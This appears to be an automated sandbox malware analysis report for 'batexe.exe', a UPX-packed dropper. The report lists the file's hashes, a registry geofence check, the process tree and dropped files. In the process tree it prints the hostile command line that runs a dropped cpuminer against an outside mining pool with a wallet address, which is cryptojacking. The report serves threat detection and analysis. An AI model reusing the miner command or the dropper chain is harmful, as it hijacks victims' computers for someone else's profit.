73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72

Analysis

max time kernel
302s
max time network
307s
platform
windows10-2004_x64
resource
win10v2004-20240221-ja
resource tags

arch:x64arch:x86image:win10v2004-20240221-jalocale:ja-jpos:windows10-2004-x64systemwindows
submitted
23/02/2024, 05:42

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

batexe.exe
Size

9.4MB
MD5

cdc9eacffc6d2bf43153815043064427
SHA1

d05101f265f6ea87e18793ab0071f5c99edf363f
SHA256

73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72
SHA512

fc6945957e160bf7059c936c329aae438e6c1521e5e43a8434f58058230d89e818eb6ff80331a4b952dbb600b8cc134ecba54e5641bf549723c98f85e993fde6
SSDEEP

196608:ERAefrn9wcsTRAJgwusnWpV3h9XxSeEGaT+TKkGzySdUkI56kBIyky:E5Tn9YVwdnWLXxkvLlzkuv

Score

7^/10

upx

Malware Config

Signatures

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3844919115-497234255-166257750-1000\Control Panel\International\Geo\Nation	b2e.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3844919115-497234255-166257750-1000\Control Panel\International\Geo\Nation	batexe.exe

Executes dropped EXE 2 IoCs

pid	Process
1852	b2e.exe
4696	cpuminer-sse2.exe

Loads dropped DLL 5 IoCs

pid	Process
4696	cpuminer-sse2.exe
4696	cpuminer-sse2.exe
4696	cpuminer-sse2.exe
4696	cpuminer-sse2.exe
4696	cpuminer-sse2.exe

UPX packed file 1 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/memory/3920-9-0x0000000000400000-0x000000000393A000-memory.dmp	upx

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious use of WriteProcessMemory 8 IoCs

description	pid	Process	procid_target
PID 3920 wrote to memory of 1852	3920	batexe.exe	92
PID 3920 wrote to memory of 1852	3920	batexe.exe	92
PID 3920 wrote to memory of 1852	3920	batexe.exe	92
PID 1852 wrote to memory of 2324	1852	b2e.exe	93
PID 1852 wrote to memory of 2324	1852	b2e.exe	93
PID 1852 wrote to memory of 2324	1852	b2e.exe	93
PID 2324 wrote to memory of 4696	2324	cmd.exe	96
PID 2324 wrote to memory of 4696	2324	cmd.exe	96

C:\Users\Admin\AppData\Local\Temp\batexe.exe
"C:\Users\Admin\AppData\Local\Temp\batexe.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3920
- C:\Users\Admin\AppData\Local\Temp\461C.tmp\b2e.exe
  "C:\Users\Admin\AppData\Local\Temp\461C.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\461C.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:1852
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\53C8.tmp\batchfile.bat" "
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2324
  - - C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe
      cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 3
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:4696

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\461C.tmp\b2e.exe

Filesize
7.2MB

MD5
7af243acb8cbda5cd2f362f1c638f532

SHA1
31b261396b00dd72c28c53616e887a157694d96e

SHA256
8905db122328da7b22a0dda1def6044c015b9e7ca7c0c709f5221ed2b0dd59e4

SHA512
c4b930b613230f0643f647181a7c0000d9d2f3ac47bb23e20ce7eaf98fde506a54ea73b7abe101b66219003fbc3527d8c688493a6d8a3324a82e2b148c2e825d

Download Submit
C:\Users\Admin\AppData\Local\Temp\461C.tmp\b2e.exe

Filesize
4.9MB

MD5
9bc8eb6554ffdcf34d93a0761da0229e

SHA1
abc991a21ec00d55f1381d74ab77da05c32697b1

SHA256
46fc982743af90038c1bc2b377ea0ad0e3a8a2abd2a1ab2c354d7a934ac8d92d

SHA512
ed5030985c538137c028f6fb7a3d2e2b4afeebe3c7c4edcbac7969f0b86c0a8d74df206b7560f414467314637f10c1b9541dcae5e71015d3fa2a17a63e46a7de

Download Submit
C:\Users\Admin\AppData\Local\Temp\461C.tmp\b2e.exe

Filesize
3.0MB

MD5
489206c8437c5b4908e0ebebb0c3cb3e

SHA1
6bcff8e909e1d82560120c5a85ab186cfa22384f

SHA256
154746cd30b3ad4c4a484143d1de4915a1f5db86a2fac53f2dbe97e096e7eda1

SHA512
fd4110bd3c888de1ba3eca4a5bf9724306b4a0cdf530e7c0df0c037fa3a9bf7ac35e0afa1eb9c90fb91c78d6cbfda7a161df670db506e2a726f5796353a81712

Download Submit
C:\Users\Admin\AppData\Local\Temp\53C8.tmp\batchfile.bat

Filesize
136B

MD5
8ea7ac72a10251ecfb42ef4a88bd330a

SHA1
c30f6af73a42c0cc89bd20fe95f9159d6f0756c5

SHA256
65e2674fc9b921a76deaf3740603359794c04e059e8937ab36eb931d65f40ec9

SHA512
a908979d588625aa24eb81238d07d88a56be5388e1265ebd2fe09889ed807aa9a4af77107e72a843c31acadbe06db0d7f6f6a3c95fb481a71e549e8eb74c2ff0

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
862KB

MD5
466b6c2cc22e77471823e7f275b81499

SHA1
c2d9ff349b0f8355f2dd79512ae70481b8fb6da6

SHA256
c35f5a81d921440307703f8fb38e4ce259bda4eeb287f8571db0c69aa39e26dc

SHA512
a219bd27ee0b759eb0ec00689abccdb575fb604e2e57f0a67e09ab25dfc6951e1c378b7f865067f57eecef2e8469ba70eddc776baee1480e8bf39b9318eb805b

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
482KB

MD5
3416eda02fa53889e62db42d5bac9f63

SHA1
edc301fd1eca719238088360d129836b9f63b026

SHA256
0ff2a9e72d905deb0a904be1a4e34e6008b5dac20380f9f8e55541ddef0e8339

SHA512
b337a5b55953ba32d75ca3b1283a13db39b3a16c1ed7bed5d461cc3d0dab1e831169098501e7970ec91d369d89d59681b8312144c5d60a31c9c9430b75b7ef95

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
728KB

MD5
c42ce51a47809eee8b1f6d2a0f9f9d93

SHA1
4054eb9394a264661296d14883e381fc072fd05d

SHA256
ed41a3be9fa447f3b28b6deb2e7e66423a29246efaf581ae6b0ec28d95bd931d

SHA512
37a16fc4313d79dabfdc0ae1085513e1291469ea9eac728d2f33d0fe123f9c3dc691b2895e4eedf04f5683cde60c0ed93289c95f97b359f4b43b4f3c9a087168

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
487KB

MD5
113b36ffb8c40f6300e2c173bab167aa

SHA1
286d0d7e2257013404e607de02c52282ef8c1696

SHA256
ecd1e1fb9f470cddd510afe36bbeca046faf857a14783f08f7478cdcd4309407

SHA512
7e9c25b55c7841e1402ecbdf851506a1fdb92071818e6852a4a4c64e6af75afbfa9c9196e5ecd4a4964c79292d9e9951c57aa35dd6f8df1b21caede3432e7e4f

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
520KB

MD5
13dbe166f444808defb18255755c6aa9

SHA1
6bcf41d8970ec8addad075d9d77bdb3026a251a5

SHA256
91de64f099987736dc3b36c89cb8af26431431dd0168a9dce1fe85286d5e44e7

SHA512
219b38c12f99bf8f3e1ba88e84870bdf60c4259981888c3935d728449ef51fba316f0813ac4080f10c756636519d3ce235eb39d6a528dbfe406268ea9845005c

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
403KB

MD5
fafbe607e22ec61d7a273ca807a12d1e

SHA1
d3d56e52e1875938ff34c6c27b34912df554ebda

SHA256
06cb6edc95a0a5d81d4e916700bee28f30caed3861189dd0576d54e227b245fa

SHA512
3b39c868d87fd54b1a9d1e6029bfb8de6139795f1aea3bd66cac32461a726a7b78b97f11cac70261da762f7c8c4f25a407d29d9436a5a65e94b3985786e0c232

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
360KB

MD5
9e4ddfb3929446fc4fe4afd41c5ab959

SHA1
ad293ec10edc4c4d93bff0e5251ef4d67ce8d777

SHA256
51a56dc64bc14522310e8ba5a3c13165a55600bedd488ff45d662abf9a5bbc69

SHA512
d3f8af83e0b00e460f5714bfbc4b2b9d73b394a783fd6fe2852ee7b28095499d3cf2a473bc8943f5a6d1ab796ee7a015257a47151ae87e14fe3993e5fd2e4e1e

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
81KB

MD5
485bb5fb769d1c52b7b9938284bf1c70

SHA1
cdd2062469574441c379cb7c3a83b8b996f4b10b

SHA256
d8406c4a68926143d1d4b6244d53d1751876a1d7d97a3a4f25b16ce618e83443

SHA512
aa2a8ae51855e44becf05ba3f16ac9a61f53c0ee764095d75e062e1af4f175ca4b03c5c3295a495efc26d91c09acd078e35acf82b6662957cd38fde0b6c9fb2e

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
100KB

MD5
ba1aeaa4529cb0839ce4c6236501dfaf

SHA1
18cba0832abbc0a0c8e7b3e8a41b84c04295d895

SHA256
7a018c7a23b04a65cfda55527b7a98d3924f15fe18a35021652c9d01fb277674

SHA512
8c712149a91e85beb13cb7c9fe2f4f8c23782a182629ce22f92471213ddc1de80268ee063203146e1a4eb7f720774e24d3958e1628242b4a43a16faefa32b956

Download Submit
C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
525KB

MD5
3ea9220c191c26ab2f5d6492180baf68

SHA1
64fa774b734adf6d5af9ed597e1c5252f97e149c

SHA256
76f2f9f752cf219d3ea614c9ad561f58b1e8ea33e0266b30850f605ae368ef20

SHA512
31275f48af57dd983b8d81576dc4ef47e8fe1622bddc145a856dd8807dae8c278206a9266bbadf8c8afb209a795b36521d7242aaca7fbdbcfc14864144c758f2

Download Submit
C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
429KB

MD5
d5181a13ce4ab2a01fd9f2f666c90a68

SHA1
2e5fc977c626dad5cb6445867115e23b16c8ff0c

SHA256
acd36e9a683119d946b210bbdb221da03eb04237e12db9982f44ca74aaf3e91c

SHA512
20c4a353c3c625712fa970661e40cb97650975d3fcf2ae2c358e453e58fa7263832b626a8ef4bd0e007f8f611a0d34db3bc3abb748269feb14ff85db67a35b4e

Download Submit
memory/1852-7-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/1852-53-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/3920-9-0x0000000000400000-0x000000000393A000-memory.dmp

Filesize
53.2MB

Download
memory/4696-48-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4696-59-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4696-44-0x0000000070800000-0x00000000708BC000-memory.dmp

Filesize
752KB

Download
memory/4696-47-0x00000000010A0000-0x0000000002955000-memory.dmp

Filesize
24.7MB

Download
memory/4696-46-0x0000000062560000-0x00000000625F8000-memory.dmp

Filesize
608KB

Download
memory/4696-43-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4696-54-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4696-45-0x0000000061440000-0x000000006156B000-memory.dmp

Filesize
1.2MB

Download
memory/4696-64-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4696-69-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4696-74-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4696-79-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4696-84-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4696-99-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download